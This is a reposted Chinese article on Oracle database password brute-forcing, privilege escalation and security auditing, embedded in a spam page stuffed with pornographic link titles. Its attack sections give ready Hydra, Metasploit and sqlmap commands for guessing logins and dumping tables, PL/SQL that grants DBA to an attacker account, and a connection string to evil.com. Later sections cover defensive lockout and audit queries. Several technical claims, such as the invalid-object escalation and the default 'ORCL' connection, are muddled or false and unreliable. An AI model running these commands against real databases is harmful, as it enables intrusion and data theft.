久久久精品视频在线_免费在线a视频_在线看的黄色网址_懂色av粉嫩av浪潮av_艳妇乳肉豪妇荡乳av_国产午夜大地久久_国产在线观看免费播放_天堂视频免费看_久久精品女同亚洲女同13_各处沟厕大尺度偷拍女厕嘘嘘

當前位置: 首頁 >綜合 > 正文

Oracle密碼暴力破解、提權、安全審計及防御 全球熱推薦

2023-06-20 10:21:02 來源:51CTO
1.1Oracle密碼暴力破解工具及方法1.1.1基于Metasploit的login_brute工具

Metasploit框架內置了名為“login_brute”的模塊,可以利用字典文件暴力破解Oracle數據庫密碼,但是使用該工具需要先獲得Oracle數據庫的用戶名。如果你沒有獲得目標數據庫的用戶名,可以使用任意一種端口掃描工具掃描出目標機器開放的Oracle監聽端口,如nmap,masscan等。

步驟1:開展端口掃描


(資料圖片僅供參考)

使用nmap對目標主機進行端口掃描,例如:

nmap -sS -p 1521

步驟2:利用Metasploit進行暴力破解

在Metasploit控制臺中使用以下命令設置需要破解的Oracle數據庫IP地址、監聽端口號、用戶名和字典文件路徑,然后執行run命令即可開始暴力破解。

use auxiliary/scanner/oracle/oracle_loginset RHOSTS set RPORT set USER_FILE set PASS_FILE run1.1.2.基于Hydra的暴力破解

Hydra是一款強大的暴力破解工具,可以用來暴力破解多種協議的密碼。這里介紹如何使用Hydra進行Oracle數據庫密碼暴力破解。

步驟1:安裝Hydra

在Linux命令行中輸入以下命令安裝Hydra:

sudo apt-get install hydra

步驟2:基于字典文件的暴力破解

如果已知用戶名,可以使用以下命令進行暴力破解,其中USERNAME為目標賬戶名、PASSWORD_FILE為密碼字典文件的路徑,IP_ADDRESS為目標機器的IP地址,PORT為目標Oracle數據庫的監聽端口號。

hydra -L USERNAME -P PASSWORD_FILE IP_ADDRESS -s PORT oracle

步驟3:基于多個用戶名的暴力破解

如果不知道目標用戶的用戶名,可以先使用Metasploit模塊進行掃描并獲得用戶名列表,然后使用Hydra對用戶名列表中的所有用戶進行暴力破解。使用以下命令進行暴力破解,其中USER_FILE為用戶名字典文件的路徑,PASSWORD_FILE為密碼字典文件的路徑,IP_ADDRESS為目標機器的IP地址,PORT為目標Oracle數據庫的監聽端口號。

hydra -L USER_FILE -P PASSWORD_FILE IP_ADDRESS -s PORT oracle

3.基于Oscanner的漏洞掃描工具

Oscanner是一款功能強大的Oracle漏洞掃描工具,它可以掃描Oracle數據庫中存在的安全漏洞和配置錯誤。使用該工具可以幫助檢測Oracle數據庫弱口令等安全問題。

步驟1:下載Oscanner

從GitHub上下載Oscanner源代碼,并解壓到本地。在Linux命令行中輸入以下命令:

git clonehttps://github.com/evyatarmeged/Oscanner.git

步驟2:開展漏洞掃描

使用以下命令開展漏洞掃描,其中IP_ADDRESS為目標機器的IP地址,PORT為目標Oracle數據庫的監聽端口號。

python OScanner.py –ip IP_ADDRESS –p PORT

掃描結果將被輸出到屏幕上,并保存到指定的文件中。

1.1.3.基于SQLmap的注入工具

SQLmap是一款流行的SQL注入工具,可以用來測試Web應用程序是否存在SQL注入漏洞。在Oracle數據庫中,可通過SQL注入漏洞盜取敏感數據,包括用戶名和密碼等。以下是利用SQLmap進行Oracle數據庫注入攻擊的步驟:

步驟1:下載SQLmap

從GitHub上下載SQLmap源代碼,并解壓到本地。在Linux命令行中輸入以下命令:

git clonehttps://github.com/sqlmapproject/sqlmap.git

步驟2:開展注入攻擊

使用如下命令開始注入攻擊,其中IP_ADDRESS為目標機器的IP地址,PORT為目標Oracle數據庫的監聽端口號。

python sqlmap.py -u "http://IP_ADDRESS:PORT/index.php?id=1" --cookie="PHPSESSID=abcdefg" --level 5 --risk 3 --batch --random-agent --dbs

通過上述命令從目標Oracle數據庫中獲取所有可用的數據庫。

步驟3:獲取數據表

使用如下命令獲取目標Oracle數據庫中的數據表:

python sqlmap.py -u "http://IP_ADDRESS:PORT/index.php?id=1" --cookie="PHPSESSID=abcdefg" --level 5 --risk 3 --batch --random-agent -D DATABASE_NAME --tables

步驟4:獲取數據列

使用如下命令獲取目標Oracle數據庫中數據表的所有列:

python sqlmap.py -u "http://IP_ADDRESS:PORT/index.php?id=1" --cookie="PHPSESSID=abcdefg" --level 5 --risk 3 --batch --random-agent -D DATABASE_NAME -T TABLE_NAME --columns

步驟5:獲取數據

使用如下命令獲取目標Oracle數據庫中的所有數據:

python sqlmap.py -u "http://IP_ADDRESS:PORT/index.php?id=1" --cookie="PHPSESSID=abcdefg" --level 5 --risk 3 --batch --random-agent -D DATABASE_NAME -T TABLE_NAME --dump

將上述命令中的“IP_ADDRESS”、“PORT”、“DATABASE_NAME”和“TABLE_NAME”替換為實際的值即可進行Oracle數據庫注入攻擊。

1.2一些開源的Oracle管理工具1.2.1PL/SQL Developer

PL/SQL Developer是一種跨平臺的IDE,允許用戶開發、測試和調試PL/SQL代碼。它包括諸如語法高亮顯示、代碼折疊、自動完成等功能,并且可與Oracle數據庫集成。官方地址:

https://www.allroundautomations.com/products/pl-sql-developer/

1.2.2SQL Developer

SQL Developer是一種功能強大的跨平臺工具,可以與多種數據庫管理系統集成,包括Oracle。它支持諸如SQL腳本編輯、數據查詢、表和字段管理等功能。此外,還提供了一些有用的插件和擴展。

官方地址:https://www.oracle.com/tools/downloads/sqldev-downloads.html

1.2.3TOra

TOra是一種開源的Oracle管理工具,可用于管理Oracle數據庫。它支持各種Oracle對象的瀏覽和編輯,包括表、視圖、過程、函數、觸發器等。TOra也提供了一些有用的功能,例如SQL查詢和編輯、數據導入和導出等。

官方地址:http://tora.sourceforge.net/

1.2.4Oracle SQLcl

Oracle SQLcl是一種跨平臺的命令行工具,允許用戶執行SQL查詢和命令。它包括一些有用的功能,例如語法高亮顯示、自動完成和歷史記錄等,并且可與Oracle數據庫集成。

官方地址:https://www.oracle.com/database/technologies/appdev/sqlcl.html

1.2.5Oracle APEX

Oracle APEX是一種基于Web的開發工具,用于開發和部署企業級應用程序。它使用Oracle數據庫作為后端,并提供了一些有用的功能,例如表和字段管理、報告生成、工作流程管理等。Oracle APEX也是一種開放源代碼的工具,用戶可以免費使用和分發。

官方地址:https://apex.oracle.com/en/

1.3Oracle數據庫提權1.3.1Oracle數據庫提權主要途徑

1. 利用無效對象進行提權

在Oracle中,無效對象指的是失效或異常的存儲過程、函數、觸發器等。攻擊者可以通過修改或者篡改其中的無效對象,實現提權目的。

2. 利用數據庫連接字符串提權

當連接到Oracle數據庫時,如果使用了高權限用戶如SYS或SYSTEM,并且在連接字符串中沒有明確地指定要訪問的具體數據庫,則默認會連接到一個叫做“ORCL”或“XE”的測試數據庫上。攻擊者可以通過構造惡意數據庫并偽裝成“ORCL”或“XE”,欺騙管理員連接到惡意數據庫,并以高權限用戶身份執行惡意操作。

3. 利用ORACLE_HOME目錄漏洞進行提權

ORACLE_HOME目錄是Oracle軟件安裝的根目錄,通常包含各種配置文件、日志文件、庫文件等。如果對ORACLE_HOME目錄的權限

1.3.2Oracle數據提權參考詳細方法及步驟

1.利用無效對象進行提權

在Oracle中,無效對象指的是失效或異常的存儲過程、函數、觸發器等。攻擊者可以通過修改或者篡改其中的無效對象,實現提權目的。例如:

CREATE OR REPLACE PROCEDURE pwn ASPRAGMA AUTONOMOUS_TRANSACTION;BEGINEXECUTE IMMEDIATE "GRANT DBA TO attacker";COMMIT;END;/ALTER PROCEDURE pwn COMPILE REUSE SETTINGS;

以下是利用無效對象進行提權的一般步驟:

(1)創建無效對象

攻擊者需要創建一個無效的 Oracle 對象并嵌入惡意代碼,例如一個無效的存儲過程、函數、觸發器等。

CREATE OR REPLACE FUNCTION invalid_func (input IN VARCHAR2) RETURN INTEGER ASBEGIN-- 惡意代碼EXECUTE IMMEDIATE "CREATE USER hacker IDENTIFIED BY 1234";RETURN 1;END;/

(2)注冊無效對象

攻擊者需要將無效對象注冊到Oracle數據庫中。這可以通過運行無效對象來完成。

EXEC invalid_func("test");

如果無效對象中嵌入的惡意代碼得到執行,攻擊者將創建一個名為“hacker”的新用戶。此時,攻擊者可以以新用戶的身份登陸到數據庫并執行任意操作。

(3)提權

已創建的新用戶可以用于提升攻擊者的權限。例如,可以使用新用戶連接到 Oracle 數據庫并執行敏感操作,或者利用新用戶訪問具有高權限的系統資源。

以下是一些參考命令:

創建無效函數

CREATE OR REPLACE FUNCTION invalid_func (input IN VARCHAR2) RETURN INTEGER ASBEGIN-- 惡意代碼EXECUTE IMMEDIATE "CREATE USER hacker IDENTIFIED BY 1234";RETURN 1;END;/

注冊無效函數

EXEC invalid_func("test");

需要注意的是,為了防止此類攻擊,Oracle管理員應該定期檢查 Oracle 數據庫中的無效對象,并刪除可能包含惡意代碼的對象。

2.利用數據庫連接字符串提權

當連接到Oracle數據庫時,如果使用了高權限用戶如SYS或SYSTEM,并且在連接字符串中沒有明確地指定要訪問的具體數據庫,則默認會連接到一個叫做“ORCL”或“XE”的測試數據庫上。攻擊者可以通過構造惡意數據庫并偽裝成“ORCL”或“XE”,欺騙管理員連接到惡意數據庫,并以高權限用戶身份執行惡意操作。例如:

sqlplus SYS/password@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=evil.com)(PORT=1521))(CONNECT_DATA=(SID=ORCL)))

以下是利用數據庫連接字符串進行提權的一般步驟:

(1)構造惡意數據庫

攻擊者需要構造一個惡意數據庫,并將其偽裝成“ORCL”或“XE”。可以使用Oracle官方提供的創建數據庫工具或手動創建數據庫。

(2)監聽端口和服務名稱

為了將惡意數據庫偽裝成“ORCL”或“XE”,需要在監聽器中添加服務名稱和監聽端口。可以通過修改listener.ora文件或通過Oracle Net Manager添加服務名稱和監聽端口來完成此操作。

(3)模擬Oracle服務器

攻擊者需要模擬Oracle服務器,接受管理員的連接請求,并將其重定向到惡意數據庫。可以使用Metasploit框架中的Oracle SQL鏈接跟蹤追蹤模塊實現這一點。

(4)連接到惡意數據庫

管理員使用高權限用戶如SYS或SYSTEM來連接到Oracle數據庫時,如果在連接字符串中沒有明確指定要訪問的具體數據庫,則默認連接到“ORCL”或“XE”測試數據庫上。攻擊者可以構造一個連接字符串,指定惡意數據庫的地址和端口,以欺騙管理員連接到惡意數據庫。

例如,以下命令將在主機evil.com上連接到名為ORCL_BACKDOOR的惡意數據庫:

sqlplus SYS/password@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=evil.com)(PORT=1521))(CONNECT_DATA=(SID=ORCL_BACKDOOR)))

(5)執行惡意操作

如果連接成功,攻擊者將能夠以高權限用戶身份執行任意惡意操作。例如,可以在Oracle數據庫中創建新用戶、修改或刪除數據庫中的數據等。

需要注意的是,Oracle管理員應該在輸入任何連接信息之前仔細驗證其合法性,尤其是在連接于高權限用戶時。另外,為了防止此類攻擊,Oracle管理員應該定期檢查監聽器配置,并配置適當的權限和保護措施。

3.利用ORACLE_HOME目錄漏洞進行提權

ORACLE_HOME目錄是Oracle軟件安裝的根目錄,通常包含各種配置文件、日志文件、庫文件等。如果對ORACLE_HOME目錄的權限過高或者存在漏洞,則攻擊者可以輕易地獲取敏感信息或者利用其中的漏洞進行提權。例如:

ln -s /root/.ssh/authorized_keys $ORACLE_HOME/dbs/init$ORACLE_SID.ora

詳細參考步驟如下:

(1)查找ORACLE_HOME目錄

可以通過以下命令查找ORACLE_HOME目錄:

ps -ef | grep pmon

該命令將顯示正在運行的Oracle進程名稱和對應的目錄,其中ORACLE_HOME為Oracle軟件的根目錄。

(2)查找可寫ORACLE_HOME目錄

攻擊者需要找到具有寫入權限的ORACLE_HOME目錄,以便在其中放置惡意程序或修改配置文件。以下命令可用于查找可寫的ORACLE_HOME目錄:

find / -name "*.ora" -type f -exec ls -l {} \;

該命令將查找所有擴展名為.ora的文件,并列出其所在的目錄及權限信息。

(3)放置惡意程序或修改配置文件

攻擊者可以將惡意程序放置在可寫的ORACLE_HOME目錄中,并運行它以獲得更高的權限。另外,攻擊者還可以修改Oracle的配置文件,以更改數據庫實例的配置或執行其他惡意操作。

(4)提升權限并獲取敏感信息

通過在可寫的ORACLE_HOME目錄中放置惡意程序或修改配置文件,攻擊者獲得了更高的權限。這使得攻擊者可以輕松地獲取敏感信息,或在Oracle數據庫中執行其他有害操作。

需要注意的是,為了防止此類攻擊,Oracle管理員應該定期檢查ORACLE_HOME目錄的權限和安全性,并配置適當的權限和保護措施。

1.4.Oracle數據暴力破解及其他安全檢測方法1.4.1暴力破解安全防范方法

1.啟用賬戶鎖定功能

Oracle 數據庫提供了賬戶鎖定功能,可以在用戶一定數量的登錄失敗嘗試后自動鎖定用戶。這可以有效防止攻擊者使用暴力破解工具進行破解:

ALTER PROFILE default LIMIT FAILED_LOGIN_ATTEMPTS 3 PASSWORD_LOCK_TIME 1;

2.配置訪問控制列表(ACL)

ACL 可以限制特定 IP 地址或網絡的訪問,防止攻擊者使用暴力破解工具對 Oracle 數據庫進行攻擊:

BEGINDBMS_NETWORK_ACL_ADMIN.CREATE_ACL (acl => "acl.xml",description => "ACL for example.com",principal => "EXAMPLE.COM",is_grant => TRUE,privilege => "connect",start_date => SYSTIMESTAMP,end_date => NULL);COMMIT;END;/

3.更改默認端口

默認情況下,Oracle 數據庫使用 1521 端口進行通信。攻擊者可以使用端口掃描工具來探測并攻擊該端口。因此,管理員應該將默認端口更改為其他端口:

ALTER SYSTEM SET LOCAL_LISTENER = "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=hostname)(PORT=port)))";

3.啟用登錄審計

啟用登錄審計可以記錄用戶登錄數據庫的詳細信息,包括時間、IP 地址和失敗嘗試次數等。這可以幫助管理員及時發現并應對暴力破解攻擊:

AUDIT SESSION WHENEVER NOT SUCCESSFUL;1.4.2其他安全檢測方法

1.定期檢查 Oracle 數據庫中的無效對象

攻擊者通常會利用無效對象進行提權。因此,Oracle 管理員應該定期檢查 Oracle 數據庫中是否有無效對象,并刪除可能包含惡意代碼的對象:

SELECT owner, object_name, object_type, statusFROM dba_objectsWHERE status = "INVALID";

2.檢查特權用戶的密碼強度

特權用戶如 SYS 或 SYSTEM 用戶帳戶對 Oracle 數據庫具有特殊權限,攻擊者通常會嘗試使用默認或弱密碼來破解這些賬戶。因此,管理員應該確保特權用戶的密碼足夠強大,并定期更改密碼:

SELECT username, account_status FROM dba_users WHERE username IN ("SYS", "SYSTEM");

3.檢查連接字符串參數

Oracle 連接字符串中的參數可以影響數據庫的安全性。管理員應該檢查參數值是否正確,并限制訪問級別:

SELECT name, value FROM v$parameter WHERE name IN ("remote_login_passwordfile", "audit_sys_operations", "os_authent_prefix");

4.檢查監聽器配置

監聽器是 Oracle 數據庫的入口點,攻擊者可以通過監聽器進行入侵。管理員應該檢查監聽器的配置,確保其安全性:

lsnrctl status

5.檢查數據庫日志

管理員應該檢查數據庫日志以獲取有關可能的安全漏洞和入侵活動的信息:

SELECT to_char(timestamp, "YYYY-MM-DD HH24:MI:SS"), username, action_name, object_name, sql_textFROM dba_audit_trailWHERE audit_timestamp > SYSDATE - 1;

6.檢查角色權限

攻擊者可以利用角色權限進行提權,因此管理員應該檢查角色的權限配置,并刪除不必要的權限:

SELECT grantee, privilege, admin_option FROM dba_sys_privs WHERE grantee IN (SELECT DISTINCT granted_role FROM dba_role_privs);

7.檢查用戶權限

攻擊者可以通過某些用戶權限進行提權。管理員應該檢查用戶的權限配置,并刪除不必要的權限:

SELECT grantee, granted_role, admin_option FROM dba_role_privs WHERE grantee IN (SELECT DISTINCT username FROM dba_users);

8.檢查用戶自定義函數

攻擊者可以通過用戶自定義函數進行提權。管理員應該檢查用戶自定義函數的源碼,以確保其安全性:

SELECT owner, name, type, text FROM dba_source WHERE type = "FUNCTION" AND line = 1 ORDER BY owner, name, type;

9.檢查安全警報日志

Oracle 提供了一個安全警報框架,可以監測和記錄各種安全事件。管理員應該檢查安全警報日志以偵測潛在的安全威脅:

SELECT * FROM dba_audit_object WHERE owner = "SYS" AND object_name LIKE "TBS%";1.5Oracle安全審計開源工具1.5.1Oracle Password Auditor (OPA)

功能:用于檢查 Oracle 數據庫中的弱口令,常見口令和安全策略是否得到正確實施。

下載地址:https://www.slac.stanford.edu/xorg/nmtf/nmtf-tools-opa.html

使用步驟和命令:

●下載 OPA 工具并解壓縮它。

●打開命令提示符或終端窗口,并切換到 OPA 的目錄。

●輸入以下命令以啟動 OPA 工具:

opa.exe -u -p -s

您還可以通過添加其他參數來自定義掃描設置,如下所示:

opa.exe -u -p -s --weakpass --defaultpass --policycheck

運行完命令后,請等待掃描完成,該工具將生成一個 HTML 報告,其中包含您查詢的所有信息。

1.5.2Oracle E-Business Suite Password Audit

功能:用于檢查 Oracle EBS 中的弱口令、常見口令和過期口令,以保護 Oracle EBS 應用程序的安全性。

下載地址:https://www.oracle.com/technetwork/apps-tech/security-ebs-password-audit-129472.pdf

使用步驟:

●下載 Oracle EBS 密碼審計工具并安裝它。

●打開工具并輸入您的 Oracle EBS 應用程序的連接信息,然后單擊“掃描”按鈕。

工具將自動執行密碼掃描并生成報告。您可以查看報告并按照其建議修復密碼問題。

1.5.3Oracle Password Cracker

功能:用于破解 Oracle 數據庫用戶的密碼。

下載地址:https://sourceforge.net/projects/oraclepwdcracker/

使用步驟和命令:

●確定您要破解的 Oracle 數據庫用戶名。

●下載并安裝 Oracle Password Cracker 工具。

●打開命令提示符或終端窗口,并切換到 Oracle Password Cracker 的目錄。

●根據以下命令格式運行工具:

orapwdcrack.exe -u -H <哈希密碼> -d <字典文件路徑>

工具將嘗試使用給定的字典文件破解密碼,并在成功時輸出密碼。

1.5.4OraPwdCrack

功能:用于使用 GPU 加速破解 Oracle 數據庫密碼。

下載地址:https://github.com/milo2012/orapwdcrack

使用步驟和命令:

●確保計算機安裝了適當的 NVIDIA 或 AMD 顯卡驅動程序和 CUDA 或 OpenCL 環境。

●下載 OraPwdCrack 工具并解壓縮它。

●打開命令提示符或終端窗口,并切換到 OraPwdCrack 的目錄。

●根據以下命令格式運行工具:

orapwddump.exe User@Host:Port ServiceName [] [<特殊選項>]

根據需要修改命令參數,如 CUDA/OpenCL 設備編號、特殊選項等。

工具將嘗試使用 GPU 加速破解密碼,并在成功時輸出密碼。

1.5.5PWDumpX

功能:用于提取 Oracle 用戶的哈希密碼。

下載地址:https://www.tarasco.org/security/pwdumpx.htm

使用步驟和命令:

●確定您要提取其哈希密碼的 Oracle 用戶名。

●下載 PWDumpX 工具并解壓縮它。

●打開命令提示符或終端窗口,并切換到 PWDumpX 的目錄。

●根據以下命令格式運行工具:

pwdumpx.exe -u -p -h

工具將提取您指定的用戶名的哈希密碼,并在命令行窗口中輸出它們。

1.5.6Oracle Security Check Tool (OSCT)

功能:用于檢查 Oracle 數據庫中的安全問題,如弱口令、未授權訪問等。

下載地址:https://www.oracle.com/technetwork/security/testout-oracle-security-check-tool-130994.pdf

使用步驟:

●下載和安裝 Oracle Security Check Tool(OSCT)。

●打開工具并輸入您的 Oracle 數據庫憑據和連接信息,然后單擊“掃描”按鈕。

●工具會自動執行安全掃描并生成報告。您可以根據報告中提供的建議來修復數據庫中的安全問題。

標簽:

返回頂部
亚州av在线播放| 亚洲色欧美另类| 国语对白做受xxxxx在线中国| 亚洲精品无码久久久久久久| 波多野结衣在线免费观看| 美女av免费观看| 国产麻豆免费观看| 日韩一区二区三区久久| 欧美一级大片免费看| 亚洲欧美偷拍视频| 成年人视频在线免费| 九色porny自拍视频| 精品不卡一区二区| 99re只有精品| 在线观看国产免费视频| 91免费国产精品| av资源免费观看| 一级黄色电影片| 免费看国产曰批40分钟| 国产又粗又长视频| 国产国语性生话播放| 免费av中文字幕| 污网站在线免费| 精品无码一区二区三区在线| 国产黄a三级三级| 蜜桃色一区二区三区| 国产一区二区三区四区视频| 亚洲日本黄色片| 老司机午夜网站| 日本黄色小视频在线观看| 亚洲精品97久久中文字幕| 精品美女久久久久| 激情综合五月网| 日韩亚洲在线视频| 在线观看成人毛片| www.国产在线播放| 中文在线观看免费网站| 精品久久人妻av中文字幕| 波多野结衣办公室双飞| 18禁裸男晨勃露j毛免费观看| 日韩欧美三级视频| 91视频在线网站| 麻豆一区二区三区视频| 国产精品一区二区三区在线免费观看| 超碰人人cao| 欧日韩免费视频| 最近中文字幕在线观看| 中文字幕精品无码亚| 国产精品九九九九| 国产小视频自拍| 懂色av粉嫩av浪潮av| 欧美xxxxxbbbbb| 日韩大片一区二区| 亚洲自偷自拍熟女另类| 午夜在线观看一区| 姝姝窝人体www聚色窝| 日韩av手机版| 日本一区二区免费视频| 在线免费观看毛片| 菠萝菠萝蜜网站| 日本韩国欧美中文字幕| 中文字幕一区二区三区四区五区人 | 欧美多人猛交狂配| yjizz视频| 亚洲午夜福利在线观看| 亚洲av无码一区二区三区dv| 性生交大片免费看女人按摩| 欧美xxxx黑人| 在线观看国产免费视频| 99久久99久久精品免费| 欧美三级在线观看视频| 亚洲精品性视频| 免费在线观看日韩| 亚洲网站在线免费观看| 制服丝袜在线一区| 一本到在线视频| 欧美成人黄色网| 欧美午夜精品理论片| www黄色在线| 艳妇乳肉豪妇荡乳av| 99在线视频免费| 黄色a级在线观看| av中文字幕网址| 一级黄色免费看| 黄瓜视频污在线观看| 欧美xxxx吸乳| 国产精品18p| 毛葺葺老太做受视频| 深夜黄色小视频| 亚洲黄网在线观看| 佐佐木明希电影| 偷偷操不一样的久久| 欧美福利视频一区二区| 欧美xxxxx精品| 91网站免费入口| 欧美日韩在线视频免费| a级在线观看视频| 久草中文在线视频| 国产精品免费无码| 不卡av电影在线| 2018天天弄| 四虎永久免费观看| 18精品爽国产三级网站| 日韩欧美激情视频| 欧美性生给视频| 日批视频免费在线观看| 欧美第一页在线观看| 中文字幕欧美色图| 国产成人亚洲综合无码| www.污视频| 午夜国产一区二区三区| 特级西西人体wwwww| 清纯粉嫩极品夜夜嗨av| 强制高潮抽搐sm调教高h| 又骚又黄的视频| 日本a级片免费观看| 又黄又爽的网站| 亚洲精品午夜国产va久久成人| 国产精品h视频| 丰满人妻av一区二区三区| 999久久久精品视频| 国产免费一区二区三区四区| 国产免费无遮挡| av久久久久久| a天堂中文在线观看| 久久这里只有精品18| 亚洲国产精品无码久久久| 女性裸体视频网站| 成人在线免费观看av| 午夜视频网站在线观看| 欧美精品日韩在线| 久久精品亚洲无码| a天堂中文字幕| 国产一级理论片| 日本免费福利视频| 五月天视频在线观看| 国产原创剧情av| 污污网站免费看| 国产老头和老头xxxx×| 在线免费观看视频黄| 超级砰砰砰97免费观看最新一期| 亚洲中文字幕无码不卡电影| 天堂成人在线观看| 蜜臀视频一区二区三区| 中文字幕乱码在线人视频| 黄色手机在线视频| 国产激情视频网站| 香蕉视频色在线观看| 精品国产av无码| 成人午夜视频精品一区| 免费看一级黄色| 中文字幕精品无| 国产在线拍揄自揄拍无码| 91在线视频国产| 亚洲熟妇无码另类久久久| 天天操天天干天天操| 日本黄大片一区二区三区| 亚洲图片综合网| 日韩美女视频网站| 丰满少妇高潮久久三区| 国产区精品在线| 国产l精品国产亚洲区久久| 天天爽夜夜爽视频| 亚洲综合伊人久久| 日本成人免费在线观看| 艳妇乳肉豪妇荡乳av| 免费国产黄色网址| 最新版天堂资源在线| 精品在线视频免费观看| 国产免费久久久久| 精品国产亚洲AV| 在线观看免费视频高清游戏推荐| 在线免费看黄视频| 国产精品传媒在线观看| 国产极品在线视频| 精品熟女一区二区三区| 99热只有这里有精品| 欧美日韩激情四射| 9191在线视频| 中文字幕超碰在线| 僵尸世界大战2 在线播放| 亚洲一二三四五| 黑人精品无码一区二区三区AV| 国产91视频一区| 精品无码av一区二区三区| 激情五月色婷婷| av免费看网址| 影音先锋黄色资源| 久久永久免费视频| 麻豆av免费在线| 男人的天堂av网| 国产熟女精品视频| 欧美国产日韩综合| 欧美视频在线第一页| 国产a级黄色片| 中文字幕日产av| 天天插天天操天天射| 搜索黄色一级片| 亚洲av成人精品一区二区三区在线播放| 久久久夜色精品| 日韩美女爱爱视频| 色婷婷av777| 99久久久久久久| 欧美成人黄色网| 久操网在线观看| 午夜时刻免费入口| 亚洲免费不卡视频| 五月天综合激情网| 北条麻妃视频在线| 一本—道久久a久久精品蜜桃| 国产大学生av| 在线观看xxxx| 亚洲欧美一区二区三区不卡| 日韩极品视频在线观看| 中文字幕成人动漫| 欧美在线 | 亚洲| 精品成人av一区二区在线播放| 最近免费中文字幕中文高清百度| 在线免费看av网站| 99久久人妻精品免费二区| 国产精品爽爽久久| 日韩成年人视频| 别急慢慢来1978如如2| 99re8这里只有精品| av无码一区二区三区| 性一交一乱一乱一视频| 天堂网一区二区| 欧美视频亚洲图片| 91黄色小网站| 91大学生片黄在线观看| 精品一区二区三区蜜桃在线| 香蕉av一区二区三区| 国产女人18毛片18精品| 日本视频在线观看免费| 拔插拔插华人永久免费| av动漫在线观看| 国产尤物av一区二区三区| 国产午夜福利一区| 天堂久久久久久| 无码国产精品高潮久久99| 国产精品欧美激情在线| 国产成人无码av| 久久婷婷综合国产| 911福利视频| 久久综合久久色| 久久黄色片视频| 国产日产欧美一区二区| 永久免费看mv网站入口| 亚洲图片另类小说| 好吊色视频一区二区三区| 午夜在线视频观看| 老牛影视av牛牛影视av| 99热这里只有精品在线观看| 最近中文字幕在线观看| 中文字幕在线看人| 男女啊啊啊视频| 日本五十熟hd丰满| 久久高清无码视频| 午夜福利123| 国内av一区二区| 欧美日韩中文不卡| 亚洲福利精品视频| 亚洲欧美激情网| 日本美女高潮视频| 色多多视频在线播放| 日本999视频| 中文久久久久久| 成人亚洲精品777777大片| www日韩在线观看| www.99av.com| 亚洲精品手机在线观看| 免费看涩涩视频| aaa一级黄色片| 亚洲av毛片在线观看| 久久成人国产精品入口| 国产亚洲精久久久久久无码77777| 欧美成人黄色网| 国产成人精品av久久| 日本三级理论片| 国产成人免费看| 国产精华7777777| 曰批又黄又爽免费视频| 一本一道人人妻人人妻αv| 国产精品一区二区三区在线免费观看| 怡红院成永久免费人全部视频| 亚洲熟妇无码久久精品| 国产免费黄色大片| 日本韩国免费观看| 又色又爽又黄18网站| 久久精品女同亚洲女同13| 日韩精品电影一区二区| 国精产品视频一二二区| 国产女人被狂躁到高潮小说| 在线观看污视频| 欧美不卡在线播放| wwww.国产| 免费在线观看国产精品| 天天操夜夜操视频| 国产精品久久久久毛片| 欧美熟妇交换久久久久久分类| 日本黄色大片在线观看| 免费看污片的网站| 吴梦梦av在线| 内射国产内射夫妻免费频道| 午夜免费看毛片| 91国产丝袜播放在线| 一卡二卡在线观看| 日本在线视频播放| 娇妻被老王脔到高潮失禁视频| 亚洲国产精品影视| 成年网站在线免费观看| 欧美成人国产精品高潮| 久久人人爽人人爽人人片av免费| 国产99久一区二区三区a片| 特种兵之深入敌后| 懂色av粉嫩av浪潮av| 成人黄色大片网站| 在线观看免费不卡av| 无码一区二区三区在线观看| 亚洲成a人片77777精品| 亚洲国产欧美视频| 国产麻豆电影在线观看| 狠狠热免费视频| 午夜精品三级久久久有码| www.天天干.com| 国产ts在线播放| 久久久久久久9| 伊人色在线视频| 中文字幕在线播放不卡| 免费看91视频| 黄色一级片中国| 精品999在线| 中文字幕一区二区三区四区视频| 天堂va欧美va亚洲va老司机| 91久久久久久久久久久久久久| 99爱视频在线| 丁香六月婷婷综合| 熟妇无码乱子成人精品| 亚洲 欧美 变态 另类 综合| 国产自偷自偷免费一区 | 中文字幕 91| 老熟妇一区二区三区啪啪| 中国男女全黄大片| 潘金莲一级淫片aaaaaa播放1| 无限资源日本好片| 国产成人精品一区二区色戒| 久草视频福利在线| 800av在线免费观看| 久久久久无码国产精品不卡| 亚洲AV无码乱码国产精品牛牛| 成人黄色a级片| 九一精品在线观看| 一卡二卡在线观看| 一区二区三区伦理片| 黑森林福利视频导航| 国产情侣小视频| 在线 丝袜 欧美 日韩 制服| 欧美亚洲日本一区二区三区| 久久久久久久久久久久久久av| 国产91在线免费观看| 真人做人试看60分钟免费| 欧美三级 欧美一级| 天堂网在线播放| 神马午夜伦理影院| 日韩久久精品视频| 国产清纯白嫩初高中在线观看性色| 黄色一级大片免费| 日本午夜视频在线观看| 午夜视频在线观看国产| 成年人视频观看| 中国一级特黄视频| 国产精品久久久视频| 性猛交ⅹ×××乱大交| 午夜精品久久久久久久96蜜桃| 99热精品免费| 99视频在线看| 国产制服丝袜在线| 黑人粗进入欧美aaaaa| www.五月激情| 成人黄色片免费| 国产精品视频一区在线观看| 私密视频在线观看| 免费看国产黄色片| 欧美视频一二区| 欧美国产综合在线| 在线免费看av片| 九九热最新地址| 欧美亚韩一区二区三区| 亚洲天堂网一区二区| 亚洲人辣妹窥探嘘嘘| 午夜国产在线视频| 日本午夜激情视频| 国产免费不卡视频| 久久观看最新视频| 中文字幕在线观看视频一区| 国产中文av在线| 亚洲天堂男人av| 蜜桃av.com| 欧美一区免费看| 搜索黄色一级片|